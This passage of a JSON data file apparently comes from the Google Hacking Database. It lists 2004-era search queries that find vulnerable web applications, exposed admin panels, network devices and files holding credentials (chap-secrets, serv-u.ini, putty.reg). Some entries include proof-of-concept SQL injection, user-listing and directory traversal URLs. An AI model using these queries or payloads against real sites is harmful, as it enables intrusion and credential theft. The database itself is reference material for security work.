Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt", "submited": "2004-10-19", "request": "\"Powered by CubeCart\"", "id": 594}, {"short description": "inurl:confixx inurl:login|anmeldung", "long description": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. 
security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/", "submited": "2004-10-19", "request": "inurl:confixx inurl:login|anmeldung", "id": 595}, {"short description": "\"VHCS Pro ver\" -demo", "long description": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"VHCS Pro ver\" -demo", "id": 596}, {"short description": "intitle:\"Virtual Server Administration System\"", "long description": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "intitle:\"Virtual Server Administration System\"", "id": 597}, {"short description": "\"SysCP - login\"", "long description": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"SysCP - login\"", "id": 598}, {"short description": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "long description": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "id": 599}, {"short description": "\"Login - Sun Cobalt RaQ\"", "long description": "The famous Sun linux appliance. 
Nice clean portal search.Various vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"Login - Sun Cobalt RaQ\"", "id": 600}, {"short description": "\"OPENSRS Domain Management\" inurl:manage.cgi", "long description": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus.", "submited": "2004-10-19", "request": "\"OPENSRS Domain Management\" inurl:manage.cgi", "id": 601}, {"short description": "intitle:plesk inurl:login.php3", "long description": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus.", "submited": "2004-10-20", "request": "intitle:plesk inurl:login.php3", "id": 602}, {"short description": "inurl:\"level/15/exec/-/show\"", "long description": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed.", "submited": "2004-10-20", "request": "inurl:\"level/15/exec/-/show\"", "id": 603}, {"short description": "inurl:/dana-na/auth/welcome.html", "long description": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510", "submited": "2004-10-20", "request": "inurl:/dana-na/auth/welcome.html", "id": 604}, {"short description": "ext:nsf nsf -gov -mil", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. 
Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This is a generic search for Lotus Domino files. It identifies Domino users. Search the GHDB for more variations on this theme.", "submited": "2004-10-20", "request": "ext:nsf nsf -gov -mil", "id": 605}, {"short description": "inurl:statrep.nsf -gov", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure. Example: * 1. Statistics Reports - 1. System * 1. Statistics Reports - 2. Mail & Database * 1. Statistics Reports - 3. Communications * 1. Statistics Reports - 4. Network * 1. Statistics Reports - 5. Clusters * 1. Statistics Reports - 6. Web Server & Retriever * 1. Statistics Reports - 7. Calendaring Scheduling * 2. Alarms * 3. Events * 4. Spreadsheet Export * 5. Graphs - 1. System Statistics * 5. Graphs - 2. System Loads * 5. Graphs - 3. System Resources * 6. Trouble Tickets - 1. Alarm * 6. Trouble Tickets - 2. Event * 7. Analysis Report * 8. File Statistics * 9. Single Copy Object Store Statistics", "submited": "2004-10-20", "request": "inurl:statrep.nsf -gov", "id": 606}, {"short description": "inurl:log.nsf -gov", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. 
Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example: * Database-Sizes * Database-Usage * Mail Routing Events * Miscellaneous Events * NNTP Events * Object Store Usage * Passthru Connections * Phone Calls-By Date * Phone Calls-By User * Replication Events * Sample Billing * Usage-By Date * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied", "submited": "2004-10-20", "request": "inurl:log.nsf -gov", "id": 607}, {"short description": "inurl:login.php \"SquirrelMail version\"", "long description": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.", "submited": "2004-10-20", "request": "inurl:login.php \"SquirrelMail version\"", "id": 608}, {"short description": "\"Ideal BB Version: 0.1\" -idealbb.com", "long description": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. 
Securityfocus currently has 3 reports idealBB.", "submited": "2004-10-21", "request": "\"Ideal BB Version: 0.1\" -idealbb.com", "id": 609}, {"short description": "(inurl:81/cgi-bin/.cobalt/) | (intext:\"Welcome to the Cobalt RaQ\")", "long description": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\".", "submited": "2004-10-22", "request": "(inurl:81/cgi-bin/.cobalt/) | (intext:\"Welcome to the Cobalt RaQ\")", "id": 610}, {"short description": "\"Powered by YaPig V0.92b\"", "long description": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452", "submited": "2004-10-22", "request": "\"Powered by YaPig V0.92b\"", "id": 611}, {"short description": "intitle:\"toshiba network camera - User Login\"", "long description": "Web interface of Toshiba network cameras.", "submited": "2004-10-25", "request": "intitle:\"toshiba network camera - User Login\"", "id": 612}, {"short description": "inurl:\"/site/articles.asp?idcategory=\"", "long description": "Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Nearly all scripts suffer from possible sql injections. 
http://www.securityfocus.com/bid/11509", "submited": "2004-10-25", "request": "inurl:\"/site/articles.asp?idcategory=\"", "id": 613}, {"short description": "index.of.dcim", "long description": "The DCIM directory is the default name for a few brands of digital cameras. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets.", "submited": "2004-10-25", "request": "index.of.dcim", "id": 614}, {"short description": "intitle:\"phpremoteview\" filetype:php \"Name, Size, Type, Modify\"", "long description": "phpRemoteView is a web-based file manager with a basic shell. With this an attacker can browse the server filesystem and use the online php interpreter. Vendor: http://php.spb.ru/remview/ (russian)", "submited": "2004-10-26", "request": "intitle:\"phpremoteview\" filetype:php \"Name, Size,", "id": 615}, {"short description": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "long description": "Yes! I probably should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... 
a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure.", "submited": "2004-10-20", "request": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "id": 616}, {"short description": "intitle:\"Index of\" upload size parent directory", "long description": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff.", "submited": "2004-10-24", "request": "intitle:\"Index of\" upload size parent directory", "id": 617}, {"short description": "filetype:cgi inurl:nbmember.cgi", "long description": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504", "submited": "2004-10-26", "request": "filetype:cgi inurl:nbmember.cgi", "id": 618}, {"short description": "\"Powered by Coppermine Photo Gallery\"", "long description": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the 
moment.http://www.securityfocus.com/bid/11485", "submited": "2004-10-26", "request": "\"Powered by Coppermine Photo Gallery\"", "id": 619}, {"short description": "\"Powered by WowBB\" -site:wowbb.com", "long description": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/", "submited": "2004-10-26", "request": "\"Powered by WowBB\" -site:wowbb.com", "id": 620}, {"short description": "\"Powered by ocPortal\" -demo -ocportal.com", "long description": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368", "submited": "2004-10-26", "request": "\"Powered by ocPortal\" -demo -ocportal.com", "id": 621}, {"short description": "inurl:\"slxweb.dll\"", "long description": "salesLogix is the Customer Relationship Management solution thatdrives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the server into authenticating a remote user as the CRM administrator without requiring a password. 
It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450", "submited": "2004-10-26", "request": "inurl:\"slxweb.dll\"", "id": 622}, {"short description": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "long description": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. 
This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.", "submited": "2004-10-26", "request": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "id": 623}, {"short description": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "long description": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325", "submited": "2004-10-26", "request": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "id": 624}, {"short description": "inurl:wiki/MediaWiki", "long description": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. 
A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7", "submited": "2004-10-26", "request": "inurl:wiki/MediaWiki", "id": 625}, {"short description": "\"inurl:/site/articles.asp?idcategory=\"", "long description": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:", "submited": "2004-10-26", "request": "\"inurl:/site/articles.asp?idcategory=\"", "id": 626}, {"short description": "\"Enter ip\" inurl:\"php-ping.php\"", "long description": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. 
The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg", "submited": "2004-10-26", "request": "\"Enter ip\" inurl:\"php-ping.php\"", "id": 627}, {"short description": "\"File Upload Manager v1.3\" \"rename to\"", "long description": "thepeak file upload manager let you manage your webtree with up and downloading files.", "submited": "2004-10-27", "request": "\"File Upload Manager v1.3\" \"rename to\"", "id": 628}, {"short description": "inurl:click.php intext:PHPClickLog", "long description": "A script written in PHP 4 which logs a user's statistics when they click on a link. The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section.", "submited": "2004-10-27", "request": "inurl:click.php intext:PHPClickLog", "id": 629}, {"short description": "intitle:welcome.to.horde", "long description": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.", "submited": "2004-10-27", "request": "intitle:welcome.to.horde", "id": 630}, {"short description": "\"BlackBoard 1.5.1-f | 2003-4 by Yves Goergen\"", "long description": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. 
It is possible that prior versions are affected as well.", "submited": "2004-10-27", "request": "\"BlackBoard 1.5.1-f | 2003-4 by Yves Goergen\"", "id": 631}, {"short description": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "long description": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages.", "submited": "2004-10-31", "request": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "id": 632}, {"short description": "\"powered by YellDL\"", "long description": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\"", "submited": "2004-10-31", "request": "\"powered by YellDL\"", "id": 633}, {"short description": "intitle:\"index of\" intext:\"content.ie5\"", "long description": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general.", "submited": "2004-10-31", "request": "intitle:\"index of\" intext:\"content.ie5\"", "id": 634}, {"short description": "intitle:\"php icalendar administration\" -site:sourceforge.net", "long description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. 
It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface.", "submited": "2004-10-31", "request": "intitle:\"php icalendar administration\" -site:sourceforge.net", "id": 635}, {"short description": "intitle:\"Web Server Statistics for ****\"", "long description": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc.", "submited": "2004-10-31", "request": "intitle:\"Web Server Statistics for ****\"", "id": 636}, {"short description": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "long description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars.", "submited": "2004-10-31", "request": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "id": 637}, {"short description": "intitle:\"php icalendar administration\" -site:sourceforge.net", "long description": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones.", "submited": "2004-10-31", "request": "intitle:\"php icalendar administration\" -site:sourceforge.net", "id": 638}, {"short description": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "long description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. 
Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields. The servers found here can be accessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search.", "submited": "2004-10-31", "request": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "id": 639}, {"short description": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "long description": "CCTV webcams by ICode.", "submited": "2004-11-03", "request": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "id": 640}, {"short description": "inurl:irc filetype:cgi cgi:irc", "long description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not allow access to anything else.", "submited": "2004-11-04", "request": "inurl:irc filetype:cgi cgi:irc", "id": 641}, {"short description": "natterchat inurl:home.asp -site:natterchat.co.uk", "long description": "NatterChat is a web-based chat system written in ASP. An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access...", "submited": "2004-11-05", "request": "natterchat inurl:home.asp -site:natterchat.co.uk", "id": 642}, {"short description": "filetype:inf inurl:capolicy.inf", "long description": "The CAPolicy.inf file provides Certificate Services configuration information, which is read during initial CA installation and whenever you renew a CA certificate. 
The CAPolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchy.", "submited": "2004-11-05", "request": "filetype:inf inurl:capolicy.inf", "id": 643}, {"short description": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "long description": "Certificate Practice Statement (CPS): A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on the certificates issued by the CA.", "submited": "2004-11-05", "request": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "id": 644}, {"short description": "filetype:cgi inurl:cachemgr.cgi", "long description": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. 
Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.", "submited": "2004-11-04", "request": "filetype:cgi inurl:cachemgr.cgi", "id": 645}, {"short description": "inurl:chap-secrets -cvs", "long description": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext.", "submited": "2004-11-06", "request": "inurl:chap-secrets -cvs", "id": 646}, {"short description": "inurl:pap-secrets -cvs", "long description": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext.", "submited": "2004-11-06", "request": "inurl:pap-secrets -cvs", "id": 647}, {"short description": "filetype:ini inurl:\"serv-u.ini\"", "long description": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc.", "submited": "2004-11-06", "request": "filetype:ini inurl:\"serv-u.ini\"", "id": 648}, {"short description": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "long description": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. 
Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193", "submited": "2004-11-05", "request": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "id": 649}, {"short description": "WebControl intitle:\"AMX NetLinx\"", "long description": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet.", "submited": "2004-11-06", "request": "WebControl intitle:\"AMX NetLinx\"", "id": 650}, {"short description": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "long description": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\".", "submited": "2004-11-06", "request": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "id": 651}, {"short description": "inurl:aol*/_do/rss_popup?blogID=", "long description": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. 
A vulnerability in AOL Journals BlogID allows an attacker to increment the numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email.", "submited": "2004-11-06", "request": "inurl:aol*/_do/rss_popup?blogID=", "id": 652}, {"short description": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "long description": "This is a \"double dork\" that finds two different shopping carts, both vulnerable. 1) Cyber-Village Online Consulting Shopping Cart: Cyber-Village's script is known to not sanitize the user input properly which leads to code execution problems. 2) Hassan Consulting's Shopping Cart: For Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal.", "submited": "2004-11-07", "request": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "id": 653}, {"short description": "inurl:newsdesk.cgi? inurl:\"t=\"", "long description": "Newsdesk is a cgi script designed to allow remote administration of website news headlines. Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data. It is furthermore known that it is possible to run system commands remotely.", "submited": "2004-11-07", "request": "inurl:newsdesk.cgi? inurl:\"t=\"", "id": 654}, {"short description": "\"Switch to table format\" inurl:table|plain", "long description": "This is an index page of O'Reilly WebSite Professional. WebsitePro was developed by O'Reilly and discontinued in August 2001. The product was then continued by Deerfield.com", "submited": "2004-11-07", "request": "\"Switch to table format\" inurl:table|plain", "id": 655}, {"short description": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "long description": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. 
An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer.", "submited": "2004-11-07", "request": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "id": 656}, {"short description": "inurl:webutil.pl", "long description": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime", "submited": "2004-11-07", "request": "inurl:webutil.pl", "id": 657}, {"short description": "\"About Mac OS Personal Web Sharing\"", "long description": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement.", "submited": "2004-11-07", "request": "\"About Mac OS Personal Web Sharing\"", "id": 658}, {"short description": "ext:conf NoCatAuth -cvs", "long description": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes.", "submited": "2004-11-07", "request": "ext:conf NoCatAuth -cvs", "id": 659}, {"short description": "inurl:\"putty.reg\"", "long description": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here.", "submited": "2004-11-07", "request": "inurl:\"putty.reg\"", "id": 660}, {"short description": "intitle:\"Icecast Administration Admin Page\"", "long description": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers.", "submited": "2004-11-07", "request": "intext:\"Icecast Administration Admin Page\" intitle:\"Icecast Administration Admin Page\"", "id": 661}, {"short description": "inurl:/adm-cfgedit.php", "long description": "PhotoPost Pro is photo gallery system. 
This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :(", "submited": "2004-11-07", "request": "inurl:/adm-cfgedit.php", "id": 662}, {"short description": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "long description": "This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file.", "submited": "2004-11-08", "request": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "id": 663}, {"short description": "inurl:portscan.php \"from Port\"|\"Port Range\"", "long description": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners.", "submited": "2004-11-12", "request": "inurl:portscan.php \"from Port\"|\"Port Range\"", "id": 664}, {"short description": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "long description": "Lots of information leakage on these pages about active network services, server info, network connections, etc..", "submited": "2004-11-12", "request": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "id": 665}, {"short description": "filetype:pst pst -from -to -date", "long description": "Finds Outlook PST files which can contain emails, calendaring and address information.", "submited": "2004-11-12", "request": "filetype:pst pst -from -to -date", "id": 666}, {"short description": "intitle:Configuration.File inurl:softcart.exe", "long description": "This search finds configuration file errors within the softcart application. 
It includes the name of the configuration file and discloses server file paths.", "submited": "2004-11-13", "request": "intitle:Configuration.File inurl:softcart.exe", "id": 667}, {"short description": "inurl:technote inurl:main.cgi*filename=*", "long description": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter.", "submited": "2004-11-13", "request": "inurl:technote inurl:main.cgi*filename=*", "id": 668}, {"short description": "intext:\"Ready with 10/100T Ethernet\"", "long description": "Xerox 860 and 8200 Printers.", "submited": "2004-11-13", "request": "intext:\"Ready with 10/100T Ethernet\"", "id": 669}, {"short description": "intext:\"UAA (MSB)\" Lexmark -ext:pdf", "long description": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)", "submited": "2004-11-13", "request": "intext:\"UAA (MSB)\" Lexmark -ext:pdf", "id": 670}, {"short description": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "long description": "This finds the default Apache page on Debian installs.", "submited": "2004-11-13", "request": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "id": 671}, {"short description": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "long description": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed 